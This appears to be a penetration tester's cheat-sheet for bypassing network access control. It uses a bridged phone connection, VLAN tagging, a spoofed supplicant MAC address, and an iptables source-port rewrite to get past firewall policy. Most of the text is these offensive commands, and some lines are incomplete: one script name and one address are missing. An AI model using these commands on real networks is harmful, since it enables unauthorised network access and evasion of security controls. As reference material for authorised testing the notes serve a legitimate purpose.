NAC bypass

Network access

NAC bypass scenario with VLAN tagging on a phone

upstream = interface connected to the switch = eth0

phy = interface connected to supplicant = eth1

------------ only once
modprobe br_netfilter
modprobe 8021q
----------- activate packet tagging
ifconfig eth1 down
ifconfig br0 down
vconfig add eth0 <VLAN_number>
ip addr add <> dev eth0.101
macchanger -m <supplicant_MAC> eth0
ifconfig eth0.101 up
route add default gw <gw_ip>
------------- cleaning
ifconfig eth0.101 down 
macchanger -p eth0
ifconfig eth1 up - if possible hardcode the 3 parameters

./ -1 eth0 -2 eth1

Modify the source port for all packet in order to evade FW policy. Take the source port used for device administration for example:

iptables -t nat -I POSTROUTING -p tcp -m tcp -j MASQUERADE --to-ports <22>